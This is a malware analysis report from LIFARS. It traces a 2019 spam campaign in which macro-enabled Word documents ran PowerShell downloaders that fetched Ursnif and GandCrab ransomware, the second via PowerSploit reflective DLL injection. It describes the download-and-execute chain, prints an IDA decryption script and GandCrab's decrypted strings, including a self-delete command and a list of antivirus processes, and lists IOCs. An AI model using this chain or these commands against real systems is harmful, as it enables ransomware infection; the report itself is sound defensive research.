Ursnif and GandCrab campaign with
the macro-enabled documents
Prepared for: LIFARS, LLC and its Subsidiaries
Prepared by: Ladislav Bačo
Date: 11/02/2019
This document and its content represent confidential information between LIFARS, LLC and company. As such, this document may not be shared with any outside party without the expressed consent of LIFARS, LLC and the company.
1
Ursnif and GandCrab campaign with the macro-enabled documents
Overview
During the first half of February 2019 there was an increase in occurrences of the Spam messages containing attached documents with the names in the form “Request” followed by the number, like “Request15.doc”. These documents contain slightly obfuscated macros which lead to execution of the PowerShell downloader. This PowerShell downloader connects to the domains registered in Russian Federation and resolved to the Russian IP addresses. It seems that on these servers are hosted malicious content, in many cases detected as the Ursnif malware.
Macro-enabled documents
The spam messages may contain the password-protected zipped Word document (with password “1234567” written in the email body), or only the document itself.
Usually the document is with blue background with text with suggestion to enable macros, or enable editing and content, as we can see on the next pictures:
Fig. 1: Documents with request for enabling macros
Each type of document contains the specific macro code, in the first case, executed on document open (AutoOpen), in the second case, executed on document close (AutoClose), see Figure 2:
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
2
Fig. 2: Olevba tool output, AutoOpen and AutoClose macro execution The macros can be extracted with the olevba tool, it is quite obfuscated, in the first case with multiple junk functions and select statements, in the second case with multiple junk variables. These two types of obfuscation are presented below:
Fig. 3: First type of obfuscation
Fig. 4: Second type of obfuscation
These macros lead after deobfuscation to running powershell with base64-encoded command. In the first type it will execute powershell directly, in the second type it will first execute the shell with the command taken from AlternativeText of one Shape. This alternative
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
3
text contains the command for execution of powershell (in some cases the command first run the ‘cmd.exe’ and then ‘powershell’):
Fig. 5: First type macro deobfuscated
Fig. 6: Second type macro deobfuscated
Fig. 7: Second type macro deobfuscated: shape with powershell command
PowerShell downloaders Decoding of the base64 encoding reveal that the first PowerShell command is obfuscated (see Fig. 8), but after quick deobfuscation it is clear that this is the PowerShell downloader. It checks if the downloaded executable file has at least 40kB and if yes, it will execute it (Fig. 9).
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
4
Fig. 8: Obfuscated PowerShell downloader
Fig. 9: Debfuscated PowerShell downloader
Decoding of the PowerShell command from the second document will result to the another downloader, which is not obfuscated in this case. It will try two approaches, first, download string and invoke it as the PowerShell command. Second, download executable file and run it via ShellExecute.
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
5
Fig. 10: PowerShell downloader from the second document
Ursnif campaign Unfortunately, the downloaded content was not present during our analysis and it was not available even during the analysis on Any.Run. But using the VirusTotal domain information we can see that multiple executable files have been downloaded from this domain and most of them has been identified as the Ursnif spyware.
Fig. 11: VirusTotal domain information
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
6
Fig. 12: VirusTotal detections
It seems that there are more domains involved in this campaign, with more “ReqeustXX.doc” documents. Also, on the Any.Run it is possible to see the increase in the number of submissions with these filenames and tagged as the Ursnif. These samples have been submitted since 05th February 2019 until now, and it seems that the campaign still continue, but with decreasing intensity.
Fig. 13: Any.Run public submissions
From these public submissions we can extract multiple contacted domains by PowerShell downloaders. We can find even more samples with filenames like “Request15.doc” by using the search engines (e.g. Google) targeted on the sites related to malware analysis (e.g. VirusTotal, Hybrid-Analysis,…). With set of these domains and samples, it is possible to reveal even more IOCs of this campaign, like contacted URLs, documents with PowerShell downloaders, downloaded executable files, etc. VirusTotal Graph is very useful tool for visualization of
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
7
relationships between malware-related entities. Create an overview of the samples, scope of the campaign, country attribution can be matter of several minutes. In this case, our investigation has resulted in the following graph with malicious domains, URLs, documents and executable files:
Fig. 14: VirusTotal Graph of IOCs associated with the Ursnif campaign
The domains from the above examples have been resolved to the Russian IP addresses from the start of the attack (the US-one is the exception, the domain pgarfielduozzelda.band has been resolved to it only since 21th February, and the black flags are also the Russian IP address regarding to whois), and also the most of these domains have been registered in Russian Federation.
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
8
PowerShell downloader leading to GandCrab ransomware During our analysis the downloaded content was not present on the involved servers and also in the most cases it was not available even during the analysis on sandboxes like Any.Run or Hybrid- Analysis. But after a while, we were able to found at least one analysis at Any.Run, in which the PowerShell downloader successfully downloaded the malicious content. The second document from the first part of our analysis is actually the one sample mentioned above, which Any.Run report contains the downloaded data. Recall from the previous text, the analyzed document contains macros, which lead to execution of the encoded PowerShell command. After decoding we can see the following PowerShell downloader:
Fig. 15: Decoded PowerShell downloader
The first URL hxxp://89.223.92.190/704e.php (which is supplied to the method DownloadString) was active during the execution at Any.Run, so we can see the downloaded content, which is then invoked as an PowerShell expression (IEX from the picture above is the alias to the commandlet Invoke-Expression).
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
9
Fig. 16: Captured communication with malicious URL
Fig. 17: Downloaded end executed content from the malicious URL
It is not obfuscated, and it is clear that this piece of PowerShell script download and execute string again, but this time, the content is downloaded from Pastebin. However, during the campaign only the 8 AV engines detected this unobfuscated 2nd stage of PowerShell downloader:
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
10
Fig. 18: VirusTotal detections of 2nd PowerShell downloader
Moreover, the downloaded content from Pastebin has even less detection ratio, with the score 1/69 only:
Fig. 19: VirusTotal detections of pastebin content
Before we can proceed with this content from Pastebin, it is useful to remind the behavior of the 2nd PowerShell downloader: download and execute script from hxxps://pastebin.com/raw/9see7UfF execute function Invoke-HQLAPCCSDIGBUMKZIHEIZPFSX (probably defined in the content downloaded from Pastebin)
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
11
PowerShell injector from Pastebin Now, let’s continue with Pastebin’s content. It is mostly unobfuscated PowerShell script, too. It seems that only two function names are partially mangled: Invoke-HSOAWYAZUAGTMWM and Invoke-HQLAPCCSDIGBUMKZIHEIZPFSX mentioned above. Also the parameters of these functions are readable, and we can found names like PEBytes, ExeArgs, ProcName and ProcId, which give us the sense of what this script is probably able to do.
Fig. 20: PowerShell script from Pastebin
Scrolling down the script, we found the code related to the structure of PE files like headers, sections, imports and exports, and code for accessing the Win32 API functions often uses for code injection, like VirtualProtect, WriteProcessMemory, CreateRemoteThread.
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
12
Fig. 21: PowerShell code related to the structure of PE files
Fig. 22: PowerShell code related to the Win32 API functions used for code-injection
This code is pretty-formatted and easily readable with meaningful variable and function names, unlike the macros and PowerShell from the first part of analysis. It is a reason for assumption that this code is copy-pastes from some publicly known tool. Trying to search for code snippets will bring us to the PowerSploit’s Invoke-ReflectivePEInjection. Yes, its name is self-describing, this script performs reflective injection of PE file (DLL library) into desired process and also loads all of the dependencies of the injected PE file. This PowerSploit’s Invoke-ReflectivePEInjection looks very similar to our Pastebin’s content, with one big difference at the end of our sample: the function Invoke- HQLAPCCSDIGBUMKZIHEIZPFSX containing Base64-encoded data used as the PEBytes argument of the function Invoke-HSOAWYAZUAGTMWM, which is the renamed function Invoke-ReflectivePEInjection from the PowerSploit:
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
13
Fig. 23: Base64-encoded PEBytes
Injected PE After decoding the PEBytes32 we get the DLL file, which is detected by the VirusTotal and Intezer as a GandCrab ransomware:
Fig. 24: VT-Tool analysis of DLL file
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
14
Fig. 25: Intezer analysis of DLL file
Also, examining the strings from this DLL reveals the original filename of this DLL file: krab5.dll, which points to version 5 of the well-known ransomware GandCrab (v5.1 in this case). The mentioned analysis of this sample from Any.Run ended with GandCrab infection, too:
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
15
Fig. 26: GandCrab ransom note from Any.Run analysis
Obfuscated strings in GandCrab After a quick look at the disassembly we can notice many calls to one particular function, in our case named by IDA as sub_10009E69. These calls appear right after the bunch of mov instructions with the integer values as the second operands. These values are moved to the local variable placed in the stack. In our case, before these mov instructions we can see pushing the address of the local variable to the stack. Usually this address is loaded to the eax register and then pushed. For better imagination, see the following screenshot taken from IDA:
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
16
Fig. 27: Obfuscated strings in GandCrab
Now, lets dive into the function sub_10009E69. For clarity purposes, we renamed this function as gandcrab_decrypt_string. It takes one string argument (char *) and extracts from it the key for encryption, encrypted data and length of the encrypted data (this is computed as xor of two DWORD values). The encryption key is in this case always 10-bytes long. After that, this is used as parameters for decryption routine, which is RC4 in this case.
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
17
Fig. 28: Decrypt string function, which prepares parameters for RC4 decryption
Decryption of the strings At this point we know enough about string obfuscation, and we should be able to decrypt these obfuscated strings even without executing the sample in debugger. It is time to create IDA script for automatic decryption of these strings. We choose IDC language instead of IDAPython, mainly because the IDAPython is officially not available in the freeware or demo version of the IDA. So IDC script should be more usable also for enthusiasts and students without IDA Pro license.
Next steps are more challenging, we need to reconstruct string argument for gandcrab_decrypt_string and finally, we need to extract the parameters for RC4decryption: key, data_length and data, then decrypt obfuscated strings and display decrypted values, e.g. we can make a comment in disassembly and log them to the script output window.
Now, put it all together and we have the IDC script for GandCrab string decryption. After run, we will obtain the following output from decryption script:
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
18
Fig. 29: Decrypted strings in GandCrab disassembly
Fig. 30: Decrypted strings, script output
From the list of decrypted strings in appendix it is clear which programs are interesting for the GandCrab. It will kill all running instances of Office programs, because they can block the encryption of opened files. It also perform checks for antivirus programs. There are also the mentions of GandCrab (keys, messages, instructions for decryption and so on).
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
19
Conclusion The two types of macro-enabled documents with PowerShell downloader spreading via emails in malicious campaign have been presented in the first part of the analysis. The PowerShell downloaders and/or the macros are slightly obfuscated, however, it is easy to defeat this obfuscation and reveal their purpose. The analysis also summarized the information and relationships between malware samples and domains related to this campaign and brought the summary of collected IOCs in the Appendix.
While the most of the contacted URLs in the Ursnif campaign from February 2019 have been cleaned (or, at least, haven’t provided any malicious content during our analysis and during publicly available analysis on various sandboxes), at least in one case one URL was active. This one URL came from the PowerShell downloader with two options/methods for downloading and executing the malicious content. Probably the one method has been used for downloading the Ursnif malware and second leads to the infection with GandCrab ransomware: the PowerShell downloader included in the VBA macro have downloaded the 2nd stage downloader, which uses the PowerSploit Reflective Injection for injecting the GandCrab DLL into its process. This case have been covered in the 2nd part of the analysis.
The GandCrab ransomware v5.1 contains obfuscated and RC4-encrypted strings and text messages, and because there was no available analytical tool for deobfuscating these strings (only for much older version of GandCrab), we decided to create our own tool as IDC script for IDA Disassembler. This IDC script was further adjusted to works also with GandCrab v5.2 and v5.3. Developed script and also the list of decrypted strings are provided in the Appendix.
References https://app.any.run/tasks/11e3d6bf-7166-4211-a9fd-cd0f264af9c7 https://app.any.run/tasks/54be5309-8bcc-41aa-adc0-84507d6bdb86 https://app.any.run/tasks/6492677c-c4a5-4866-93c6-dc2fcdabcd99 https://www.virustotal.com/#/domain/hkf98ua36ou.com https://www.virustotal.com/#/file/60ea9fba1999ea637eeeea71045277d0e191e9854931c 0e4a59649d5fa2d35b9 https://www.virustotal.com/graph/embed/gfbc000ebc04146588a291146a3f927d0bd26f5 e068c2479fb69d7b5e2684af1f https://pastebin.com/r6bcVjA9 Any.Run analysis
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
20
VirusTotal analysis of 2nd powershell downloader UrlHouse Entry for PE injector from pastebin VirusTotal analysis of PE injector from pastebin PowerSploit’s Invoke-ReflectivePEInjection VirusTotal analysis of infected GandCrab DLL Intezer analysis of infected GandCrab DLL IDC script for GandCrab string decryption on GitHub https://www.baco.sk/posts/ursnif-requestdoc-campaign-1/ https://www.baco.sk/posts/ursnif-requestdoc-campaign-2/ https://www.baco.sk/posts/gandcrab-string-decryption-1/ https://www.baco.sk/posts/gandcrab-string-decryption-update/
Appendix IDC script for GandCrab string decryption #include
//Key-scheduling algorithm for (i=0; i<256; i++){ S[i] = i; } w = 0; for (i=0; i<256; i++){ w = (w + ord(S[i]) + ord(key[i % key_length])) % 256;
b = S[i]; S[i] = S[w]; S[w] = b; }
//decrypting, xor ciphertext with pseudorandom stream of bytes i = w = 0; for (index=0; index b = S[i]; S[i] = S[w]; S[w] = b; K = ord(S[ord(S[i])+ord(S[w]) % 256]) % 256; 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 21 data[index] = ord(data[index]) ^ K; } return data; } static wchar2ascii(str) { auto i; auto ret = ""; for (i=i; i return ret; } static str2dword(str) { auto i, ret; ret = 0; for (i=3; i>=0; i--) { ret = ret*0x100 + ord(str[i]); } //print("str2dword", str, ret); return ret; } static get_push_reg(addr) { // find argument (register name) for string decrypt function // in the form of "push %reg" while (GetMnem(addr) != "push") { //Message(" %08lx\t%s\n", addr, GetDisasm(addr)); addr = FindCode(addr, SEARCH_UP | SEARCH_NEXT); } //Message("push\n %08lx\t%s\n", addr, GetDisasm(addr)); // get register name return GetOpnd(addr, 0); } static get_reg_offset(addr, reg) { // find the instruction which sets the value of the pushed register // in the form of "lea, %reg, [ebp-offset]" do { addr = FindCode(addr, SEARCH_UP | SEARCH_NEXT); } while ((GetMnem(addr) != "lea") || (GetOpnd(addr,0) != reg)); //Message("set value\n %08lx\t%s\n", addr, GetDisasm(addr)); // instruction in the form of "lea %eax, [%ebp-offset]" return GetOperandValue(addr,1); } static get_start_addr_of_string(addr, offset) { // find the address of the instruction which sets the first bytes of reconstructed string // in the form of "mov [ebp-offset], imm" do { addr = FindCode(addr, SEARCH_UP | SEARCH_NEXT); } 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 22 while ((GetMnem(addr) != "mov") || (GetOpType(addr,1) != o_imm) || (GetOperandValue(addr,0) != offset)); return addr; } static get_max_offset(addr1, addr2) { // find the max offset (aka end of the reconstructed string) across the "mov [ebp- offset], imm" instructions auto addr, offset, max = -0x1fffffff; for (addr = addr1; addr < addr2; addr = FindCode(addr, SEARCH_DOWN | SEARCH_NEXT)) { if ((GetMnem(addr) == "mov") && (GetOpType(addr,1) == o_imm)) { offset = GetOperandValue(addr,0); if (offset > max) { max = offset; } } } return max; } static get_string_argument(ref) { auto addr, reg, ebp_offset, ebp_max_offset, arglength, argument; // get register name from the instruction "push %reg" reg = get_push_reg(ref); // get ebp offset stored in register by instruction "lea, %reg, [ebp-offset]" // aka start of the reconstructed string argument ebp_offset = get_reg_offset(ref, reg); // find the instruction which sets the first bytes of reconstructed string addr = get_start_addr_of_string(ref, ebp_offset); // find the max ebp offset, aka end of the reconstructed string argument ebp_max_offset = get_max_offset(addr, ref); arglength = ebp_max_offset - ebp_offset; argument = strfill('\x00', arglength); //Message(" ebp_offset=%x, ebp_max_offset=%x, arglength=%x, addr=%08lx\n",ebp_offset, ebp_max_offset, arglength, addr); // reconstruct string argument from instruction like "mov [ebp-offset], value" auto offset, value; for (addr; addr < ref; addr=FindCode(addr,SEARCH_DOWN|SEARCH_NEXT)) { // instruction like "mov [ebp-offset], value" if ((GetMnem(addr) == "mov") && (GetOpType(addr,1) == o_imm)) { offset = GetOperandValue(addr,0); // set value for desired string argument starting at [ebp-ebp_offset] if (offset-ebp_offset >= 0) { value = GetOperandValue(addr,1); //Message(" %08lx\t[%d] = %08x\n", addr, offset-ebp_offset, value); //Message(" %08lx\t%s\n", addr, GetDisasm(addr)); //convert dword value to bytes in string auto i; for (i=0; i<4; i++) { argument[offset-ebp_offset+i] = value & 0xFF; value = value>>8; } } 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 23 } } //Message(" %08lx\targument\n", ref); //print(argument); return argument; } static count_xrefs(addr) { auto ref, count; count = 0; ref = RfirstB(addr); while (ref!=BADADDR) { count = count + 1; ref = RnextB(addr,ref); } //Message("%08x: %d, %x\n", addr, count,GetFunctionAttr(addr,FUNCATTR_FRSIZE)); return count; } static find_decrypt_function() { // find the address of the string decryption function with following conditions: // it is short (up to 0x25 bytes) // it is heavily used (at least 100 xrefs) // it contains exactly one call instruction (for calling RC4 decryption routine) // it contains exactly 5 push instructions (one push ebp from prologue and 4 arguments for RC4) auto func_start, func_end, found; found = 0; func_start = NextFunction(0); while ((func_start!=BADADDR) && (found == 0)) { func_start = NextFunction(func_start); func_end = FindFuncEnd(func_start); if (func_end-func_start < 0x25) { auto addr, push_count, call_count; push_count = 0; call_count = 0; addr = func_start; while (addr < func_end) { if (GetMnem(addr) == "push") push_count = push_count + 1; if (GetMnem(addr) == "call") call_count = call_count + 1; addr = FindCode(addr, SEARCH_DOWN | SEARCH_NEXT); } if ((push_count == 5) && (call_count == 1) && (count_xrefs(func_start) > 100)) { found = 1; } } //Message("%08x: %08x, %d --> %d\n", func_start, func_end, count_xrefs(func_start), found); } return func_start; } static main() { Message("\n=====GandCrab String Decryptor=====\n\n"); 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 24 auto ea, ref; // string decrypt function //ea = 0x407563; ea = find_decrypt_function(); // get first xref to calling decrypt function ref = RfirstB(ea); while (ref!=BADADDR) { //ref = 0x10006866; Message("%08lx: xref to decrypt function %08lx \n", ref, ea); // find xrefs to calling decrypt function if ((XrefType() == fl_CN) || (XrefType() == fl_CF)) { // reconstructs string argument auto argument = get_string_argument(ref); // parse parameters from string argument auto key_length = 0x10; auto key = substr(argument,0,key_length); auto data = substr(argument,key_length+8,-1); auto length = str2dword(substr(argument,key_length,key_length+4)) ^ str2dword(substr(argument,key_length+4,key_length+8)); //print(length); // if the strings is too long, there may be an error, or it can be long binary data if (length < 0x10000) { auto text = RC4_decrypt(key, key_length, data, length); auto plaintext; // simple check for widechar string if (text[1] == '\x00') { plaintext = wchar2ascii(text); } else { plaintext = text; } // prints decrypted string to output windows Message("\"%s\" (length: 0x%x)\n\n", plaintext, strlen(plaintext)); ; // puts comment at the call of the decryption function MakeComm(ref, plaintext); } } ref = RnextB(ea,ref); } //auto ret = RC4_decrypt("OJ\xABkMp\x10\x9B\xA4\xCF\x041\xD0\x7Fe\xDE", 0x10, "\xD8#(\xDALF\x90\r\xC3\xAC\xFA\x0F\xBE\xBA\xB3k\xD5\xE7\xB5\xF0\x06""7", 0x16); //msg("\"%s\" (wchar length: 0x%x)\n", wchar2ascii(ret), strlen(ret)); } 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 25 List of decrypted strings “Global\iyAzNATdi7a94U8TAO7zVm5qzEjzks” (length: 0x26) “Global\%s.luck” (length: 0x10) ”@hashbreaker Daniel J. Bernstein let’s dance salsa <3” (length: 0x36) ”@hashbreaker :)))” (length: 0x12) “A” (length: 0x2) “onenote.exe” (length: 0xc) “outlook.exe” (length: 0xc) “powerpnt.exe” (length: 0xe) “steam.exe” (length: 0xa) “thebat.exe” (length: 0xc) “thebat64.exe” (length: 0xe) “thunderbird.exe” (length: 0x10) “visio.exe” (length: 0xa) “winword.exe” (length: 0xc) “wordpad.exe” (length: 0xc) “runas” (length: 0x6) ”—BEGIN GANDCRAB KEY—” (length: 0x1a) ”—END GANDCRAB KEY—” (length: 0x18) ”—BEGIN PC DATA—” (length: 0x14) ”—END PC DATA—” (length: 0x12) “pc_user” (length: 0x8) “pc_name” (length: 0x8) “pc_group” (length: 0xa) “av” (length: 0x4) “pc_lang” (length: 0x8) “pc_keyb” (length: 0x8) “os_major” (length: 0xa) “os_bit” (length: 0x8) “ransom_id” (length: 0xa) “hdd” (length: 0x4) “ip” (length: 0x4) “ransom_id=” (length: 0xc) “SOFTWARE\keys_data\data” (length: 0x18) “public” (length: 0x8) “private” (length: 0x8) “open” (length: 0x6) “Keyboard Layout\Preload” (length: 0x18) “00000419” (length: 0xa) ”/c timeout -c 5 & del “%s” /f /q” (length: 0x22) “open” (length: 0x6) “cmd.exe” (length: 0x8) 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 26 “pc_user” (length: 0x8) “pc_name” (length: 0x8) “pc_group” (length: 0xa) “av” (length: 0x4) “pc_lang” (length: 0x8) “pc_keyb” (length: 0x8) “os_major” (length: 0xa) “os_bit” (length: 0x8) “ransom_id” (length: 0xa) “hdd” (length: 0x4) “ip” (length: 0x4) “&id=” (length: 0x6) “&sub_id=” (length: 0xa) “&version=” (length: 0xa) “&action=call” (length: 0xe) ”%s/%s/%s/%s.%s” (length: 0x10) “wp-content” (length: 0xc) “static” (length: 0x8) “content” (length: 0x8) “includes” (length: 0xa) “data” (length: 0x6) “uploads” (length: 0x8) “news” (length: 0x6) “jpg” (length: 0x4) “png” (length: 0x4) “gif” (length: 0x4) “bmp” (length: 0x4) “im” (length: 0x4) “de” (length: 0x4) “ka” (length: 0x4) “ke” (length: 0x4) “am” (length: 0x4) “so” (length: 0x4) “fu” (length: 0x4) “se” (length: 0x4) “da” (length: 0x4) “he” (length: 0x4) “me” (length: 0x4) “mo” (length: 0x4) “th” (length: 0x4) “zu” (length: 0x4) “images” (length: 0x8) “pictures” (length: 0xa) “image” (length: 0x6) 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 27 “graphic” (length: 0x8) “assets” (length: 0x8) “pics” (length: 0x6) “imgs” (length: 0x6) “tmp” (length: 0x4) “http://%s” (length: 0xa) “POST” (length: 0x6) “Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko” (length: 0xc5) “GET” (length: 0x4) “HTTP/1.1” (length: 0xa) ”%s\%s-DECRYPT.txt” (length: 0x12) ”%s\KRAB-DECRYPT.txt” (length: 0x14) ”%s.KRAB” (length: 0x8) “ntdll�dll” (length: 0xc) “NtSetInformationFile” (length: 0x18) “d9sktop.ini” (length: 0xe) “autorun.inf” (length: 0xc) “ntuser.dat” (length: 0xc) “iconcache.db” (length: 0xe) “bootsect.bak” (length: 0xe) “boot.ini” (length: 0xa) “ntuser.dat.log” (length: 0x10) “thumbs.db” (length: 0xa) ”-DECRYPT.txt” (length: 0xe) ”-DECRYPT.html” (length: 0xe) ”%s-DECRYPT.html” (length: 0x10) ”%s-DECRYPT.txt” (length: 0x10) “KRAB-DECRYPT.html” (length: 0x12) “CRAB-DECRYPT.html” (length: 0x12) “KRAB-DECRYPT.txt” (length: 0x12) “CRAB-DECRYPT.txt” (length: 0x12) “ntldr” (length: 0x6) “NTDETECT.COM” (length: 0xe) “Bootfont.bin” (length: 0xe) “SQL” (length: 0x4) ”%s%x%x%x%x.lock” (length: 0x10) “\ProgramData\” (length: 0xe) “\IETldCache\” (length: 0xe) “\Boot\” (length: 0x8) “\Program Files\” (length: 0x10) “\Tor Browser\” (length: 0xe) “\All Users\” (length: 0xc) “\Local Settings\” (length: 0x12) “\Windows\” (length: 0xa) 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 28 ”=” (length: 0x2) “&” (length: 0x2) “undefined” (length: 0xa) “AVP.EXE” (length: 0x8) “ekrn.exe” (length: 0xa) “avgnt.exe” (length: 0xa) “ashDisp.exe” (length: 0xc) “NortonAntiBot.exe” (length: 0x12) “Mcshield.exe” (length: 0xe) “avengine.exe” (length: 0xe) “cmdagent.exe” (length: 0xe) “smc.exe” (length: 0x8) “persfw.exe” (length: 0xc) “pccpfw.exe” (length: 0xc) “fsguiexe.exe” (length: 0xe) “cfp.exe” (length: 0x8) “msmpeng.exe” (length: 0xc) “SYSTEM\CurrentControlSet\services\Tcpip\Parameters” (length: 0x34) “WORKGROUP” (length: 0xa) “Contro6 Panel\International” (length: 0x1e) “LocaleName” (length: 0xc) “Keyboard Layout\Preload” (length: 0x18) “00000419” (length: 0xa) “productName” (length: 0xc) “SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion” (length: 0x3a) “productName” (length: 0xc) “error” (length: 0x6) “x86” (length: 0x4) “HARDWARE\DESCRIPTION\System\CentralProcessor\0” (length: 0x30) “ProcessorNameString” (length: 0x14) “Identifier” (length: 0xc) “ntdll.dll” (length: 0xa) “RtlComputeCrc32” (length: 0x10) “UNKNOWN” (length: 0x8) “NO_ROOT_DIR” (length: 0xc) “REMOVABLE” (length: 0xa) “FIXED” (length: 0x7) “REMOTE” (length: 0x8) “CDROM” (length: 0x7) “RAMDISK” (length: 0x8) “Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko” (length: 0x1fc5) “HTTP/1.1” (length: 0xa) “ENCRYPTED BY GANDCRAB %s” (length: 0x1c) “DEAR %s, ” (length: 0xa) 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 29 “DEAR USER, ” (length: 0xc) “YOUR FILES ARE UNDER STRONG PROTECTION BY OUR SOFTWARE. IN ORDER TO RESTORE IT YOU MUST BUY DECRYPTOR” (length: 0x68) “For further steps read %s-DECRYPT.%s that is located in every Mncrypted folder” (length: 0x4f) 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 30 IOCS associated with Ursnif campaign IP adresses: 46.173.219.104 46.29.167.73 89.223.28.184 109.234.38.152 176.32.33.171 185.120.58.13 185.228.234.159 185.228.234.5 193.187.172.169 209.141.58.88 213.226.124.245 Domains: d49dv62iea39.email d74yhvickie.band fmarquisecale.com g53lois51bruce.company hkf98ua36ou.com nuavclq20tony.com pgarfielduozzelda.band rz70tom99.band veulalmffyy.company wbfnjohanna.band www.g53lois51bruce.company www.nuavclq20tony.com www.xvirginieyylj.city xvirginieyylj.city zgnoeliakatelynn.com URLs: hxxp://d49dv62iea39.email/ hxxp://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdo.php hxxp://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdo.phpl=noos11.harz hxxp://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=noos12.harz hxxp://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=noos15.harz hxxp://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=noos1.harz hxxp://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=noos2harz hxxp://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdophp?l=noos2harz hxxp://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=noos4.harz hxxp://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=noos7.harz hxxp://d74yhvickie.band/ hxxp://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php hxxp://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php?1=cubom13.jam 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 31 hxxp://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php?l=cubom10.jam hxxp://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php?l=cubom10.jam. hxxp://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php?l=cubom[1-16].jam hxxp://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php?l=cubom13.jam hxxp://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php?l=cubom17.jam hxxp://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php?l=cubom8.jam hxxp://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php?l=cubom9.jam hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php?l=ledid14.jam hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php?l=ledid1.jam hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php?l=ledid2.jam hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php?l=ledid3.jam hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php?l=ledid4.jam hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php?l=ledid5.jam hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php?l=ledid6.jam hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php?l=ledid7.jam hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php?l=ledid8.jam hxxp://g53lois51bruce.company/ hxxp://g53lois51bruce.company/xap_102b-AZ1 hxxp://g53lois51bruce.company/xap_102b-AZ1/ hxxp://g53lois51bruce.company/xap_102b-AZ1/704e.php hxxp://g53lois51bruce.company/xap_102b-AZ1/704e.php?l=xtex10.gas hxxp://g53lois51bruce.company/xap_102b-AZ1/704e.php?l=xtex[1-15].gas hxxp://g53lois51bruce.company/xap_102b-AZ1/704e.php?l=xtex15.gas hxxp://g53lois51bruce.company/xap_102b-AZ1/704e.php?l=xtex4.gas hxxp://g53lois51bruce.company/xap_102b-AZ1/704e.php?l=xtex7.gas hxxp://hkf98ua36ou.com/ hxxp://hkf98ua36ou.com/xap_102b-AZ1 hxxp://hkf98ua36ou.com/xap_102b-az1/704e.php hxxp://hkf98ua36ou.com/xap_102b-AZ1/704e.php?1adnaz8.gas 